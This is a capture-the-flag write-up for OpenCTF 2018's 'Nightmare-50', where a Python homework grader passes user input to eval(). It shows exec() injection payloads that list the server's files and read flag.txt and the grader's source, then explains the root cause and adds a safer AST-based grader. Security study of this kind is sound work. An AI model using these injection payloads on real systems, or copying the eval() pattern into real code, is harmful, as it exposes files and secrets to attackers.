OpenCTF 2018: Challenge 24 (Nightmare-50)
Challenge text:
Nightmare-50 50 ---
Automated home work scoring my ass. https://shades-of-nightmare.openctf.com/nzpoixyucvkjwnerntasdfascdvasdfqwerqwe/nightmare-50/
This website hosts a 'homework grading' application as an Xterm.js/Gotty webapp:
Welcome to Doctor Professor Wilson's Python 101!
Lesson 1: hello world
Enter homework for grading:
Here we can enter a single line of Python code, which turns out to be passed to eval(). We'll first want to explore the filesystem. Because we can only use a single line and eval() accepts a single expression rather than statements such as import, we have to resort to some trickery with exec:
exec("import os;\nprint(os.listdir('.'))")
This gives us:
['lib64', 'lib', 'sys', 'mnt', 'home', 'bin', 'var', 'usr', 'tmp', 'media', 'proc', 'boot', 'sbin', 'dev', 'run', 'opt', 'etc', 'root', 'srv', '.dockerenv', 'entry.sh', 'requirements.txt', 'flag.txt', 'hackme.py']
We assume the flag is in flag.txt and read this:
exec("with open('flag.txt', 'r') as f:\n print(f.read())")
And this returns the flag: ThisIsAVeryFl@ggyFlag
As a bonus, we can also extract the contents of hackme.py:
exec("with open('hackme.py', 'r') as f:\n print(f.read())")
hackme.py:
import sys
# no traceback
sys.tracebacklimit = 0
# globals dict handed to eval(): shadows locals/globals/__name__/__file__ with None,
# but leaves __builtins__ untouched, so exec and open remain reachable
env = dict(locals=None, globals=None, __name__=None, print=print, __file__=None)
print("Welcome to Doctor Professor Wilson's Python 101!")
print("Lesson 1: hello world")
inject = input("Enter homework for grading:\n")
eval(inject, env)
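The root cause is that the env dict only shadows a handful of names; a globals dict without a __builtins__ key gets the full builtins inserted by eval() itself, which is why exec and open worked above. The following is an added example, not part of the original writeup or the challenge, that demonstrates that behaviour on a copy of the challenge's env and shows an alternative grader that never evaluates the submission at all: it parses it with ast and accepts only a single print() call with string-literal arguments. The function names (builtins_reachable, check_submission, grade) and the Rejected exception are assumptions made for this example.

```python
import ast

# Copy of the challenge's globals dict (from hackme.py), used here only for comparison.
CHALLENGE_ENV = dict(locals=None, globals=None, __name__=None, print=print, __file__=None)


def builtins_reachable(env):
    """Return True if eval() with this globals dict exposes exec and open.

    CPython inserts the builtins under the key __builtins__ when a globals
    dict lacks it, so shadowing a few names does not make eval() a sandbox.
    """
    env = dict(env)          # work on a copy so the caller's dict is untouched
    eval("0", env)           # evaluating any expression triggers the insertion
    b = env.get("__builtins__")
    if b is None:
        return False
    names = b if isinstance(b, dict) else vars(b)   # module or its __dict__
    return "exec" in names and "open" in names


class Rejected(Exception):
    """Raised when a submission is not a plain print() of string literals."""


def check_submission(source):
    """Parse the submission and return the literal strings passed to print().

    Nothing is executed: the AST is inspected and every node outside the
    safe-list (a single Call to the Name 'print' with str Constant args) is rejected.
    """
    try:
        tree = ast.parse(source, mode="eval")
    except SyntaxError as exc:
        raise Rejected(f"syntax error: {exc}")
    body = tree.body
    if not (isinstance(body, ast.Call)
            and isinstance(body.func, ast.Name)
            and body.func.id == "print"):
        raise Rejected("only a call to print() is allowed")
    if body.keywords:
        raise Rejected("keyword arguments are not allowed")
    for arg in body.args:
        if not (isinstance(arg, ast.Constant) and isinstance(arg.value, str)):
            raise Rejected("print() arguments must be string literals")
    return [arg.value for arg in body.args]


def grade(source):
    """Grade a 'hello world' submission without evaluating it.

    Returns ("ok", <printed text>) or ("rejected", <reason>).
    """
    try:
        args = check_submission(source)
    except Rejected as exc:
        return ("rejected", str(exc))
    return ("ok", " ".join(args))


if __name__ == "__main__":
    # Constructed sample submissions: the intended homework and the two payloads from the writeup.
    samples = [
        "print('hello world')",
        "exec(\"import os;\\nprint(os.listdir('.'))\")",
        "exec(\"with open('flag.txt', 'r') as f:\\n print(f.read())\")",
    ]
    print("challenge env exposes exec/open:", builtins_reachable(CHALLENGE_ENV))
    for s in samples:
        print(repr(s), "->", grade(s))
```

The AST safe-list is deliberately narrow: for a lesson whose only expected answer is a print of a literal, refusing everything else is cheaper and easier to reason about than trying to strip dangerous names from a globals dict. If later lessons need real execution, run the submission in a separate process with OS-level isolation rather than relying on eval() arguments.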